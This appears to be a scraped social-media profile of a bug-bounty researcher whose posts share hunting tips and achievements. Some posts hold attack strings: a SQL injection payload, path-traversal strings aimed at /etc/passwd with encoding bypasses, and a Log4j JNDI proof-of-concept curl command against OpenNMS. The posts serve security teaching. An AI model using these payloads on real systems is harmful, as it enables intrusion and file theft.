0xElkot Profile Banner
MahMoud Elkot Profile
MahMoud Elkot

@0xElkot

Followers
2K
Following
3K
Media
22
Statuses
179

Cyber Security Consultant | Security Researcher (Part time)

Cairo
Joined July 2016
Don't wanna be here? Send us removal request.
@0xElkot
MahMoud Elkot
1 day
Ever wished Shodan gave you data in 1 click instead of hours of copy-paste? 👀. I built Shodan Page Scraper 🕵️‍♂️ – a Chrome extension that rips:.✅ IPs.✅ Open Ports.✅ Subdomains.✅ DNS records.⚡ Idea came from @GodfatherOrwa during . #PHdays #BugBounty #Shodan #Infosec #RedTeam
2
1
4
@0xElkot
MahMoud Elkot
4 months
🔍 Tip for finding SQLi in WordPress plugins:. - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical.#BugBounty #SQLi
Tweet media one
Tweet media two
2
16
136
@0xElkot
MahMoud Elkot
4 months
🔍 LFI Hunting Tips from Real Finds:.1️⃣ GET path injection: Try ///. /. /. /. /etc/passwd. Fuzz w/ Burp!.2️⃣ POST LFIs: Test endpoints like /router.jsp?. /etc/passwd. 3️⃣ Hidden params: Brute-force w/ ParamSpider or check JS files. 💡 Bypass filters w/ %2e%2f or %00 Stay ethical!
Tweet media one
Tweet media two
1
67
343
@0xElkot
MahMoud Elkot
1 year
A new acknowledgement form @Apple for finding some vulnerabilities on one of main domains. #bug_hunting #bugbounty #xss #apple
Tweet media one
0
0
8
@0xElkot
MahMoud Elkot
1 year
In April, I submitted 19 vulnerabilities to 8 programs on @Hacker0x01. #TogetherWeHitHarder
1
0
5
@0xElkot
MahMoud Elkot
1 year
Heeey there, I'm now part of Clear.
Tweet media one
2
0
19
@0xElkot
MahMoud Elkot
1 year
Short sad story 🙂.#bughunting #xss
Tweet media one
Tweet media two
6
1
31
@0xElkot
MahMoud Elkot
1 year
A new write up for automating XSS. Note: I illustrate Xray installation here too. #BugBounty #bugbountytips #xss.
Tweet card summary image
0xelkot.medium.com
So let’s start :)
0
17
65
@0xElkot
MahMoud Elkot
2 years
I have found about 50 XSS on a single program, .using my automation progress that's you will find it here and @SirBagoza Tips on his videos. #bugbountytips #xss #hackerone #h1
Tweet media one
@0xElkot
MahMoud Elkot
3 years
Hi guys , If anyone interested on Bug bounty automation see this article . #bugbountytips #SQLi #XSS #LFI #Recon.
15
78
380
@0xElkot
MahMoud Elkot
2 years
A year without hunting, time to streak again 🔥🔥.#bugbounty #h1 #hackerone
Tweet media one
3
0
71
@0xElkot
MahMoud Elkot
2 years
When I pentest on a project,.I found it use Wordpress CMS. So I think to get some juicy endpoints from /wp-json/. So I decide to create a python script to extract all endpoints and URLs from wp-json url. Github Link: #cyber_security #wordpress #Pentest
4
31
115
@0xElkot
MahMoud Elkot
2 years
My journey started in 2019 with @NakerahNetwork , Then @3XS0 support me in a lot of cases and scenarios, Now I would like to thank you from all my heart to be here in this community because of you and for your continued support.
1
1
7
@0xElkot
MahMoud Elkot
2 years
I would like to thank all of you @NakerahNetwork & @0xMuhammad for being the reason for starting my journey and being with me as a mentor , Now I discovered more than 300 vulnerabilities and Get in more 5 Engagements. Special Thanks to my Supporter all time @3XS0 .#bugbounty.
4
2
35
@0xElkot
MahMoud Elkot
3 years
Yeah Yeah, it's me 😂🤣.#BugBounty
Tweet media one
0
0
9
@0xElkot
MahMoud Elkot
3 years
Hi guys , If anyone interested on Bug bounty automation see this article . #bugbountytips #SQLi #XSS #LFI #Recon.
Tweet card summary image
0xelkot.medium.com
Hello all, My name is Mahmoud Attia aka 0xelkot
15
173
492
@0xElkot
MahMoud Elkot
3 years
Based on my last comment with @GodfatherOrwa and @eslam3kll , This is the template of SQLi Detection .Steps: .1- Catch all requests of parameters. 2- Grep reflected parameters with gf and Kxss.3- Fire this template.#happy_hacking #bugbounty
8
139
331
@0xElkot
MahMoud Elkot
3 years
PoC:.curl -X POST -k --path-as-is http://192.168.0.140:8980/opennms/j_spring_security_check -d 'j_username=${jndi:ldap://192.168.0.140:1389/serial/CustomPayload}&j_password=abcd&j_usergroups=&Login='.#BugBounty #Log4j.
@johnk3r
Padawan
3 years
PoC to detect the LOG4J vulnerability in the OpenNMS solution:. @pdnuclei @Horizon3ai
Tweet media one
0
5
12
@0xElkot
MahMoud Elkot
3 years
Some achievements from Microsoft:.MS-500.SC-300.SC-200.#security #CyberSecurity #BugBounty #Microsoft
Tweet media one
Tweet media two
Tweet media three
1
2
12
@0xElkot
MahMoud Elkot
4 years
My first RCE triggered on hackerone .#BugBounty #bugbountytips #cybersecurity
Tweet media one
0
2
20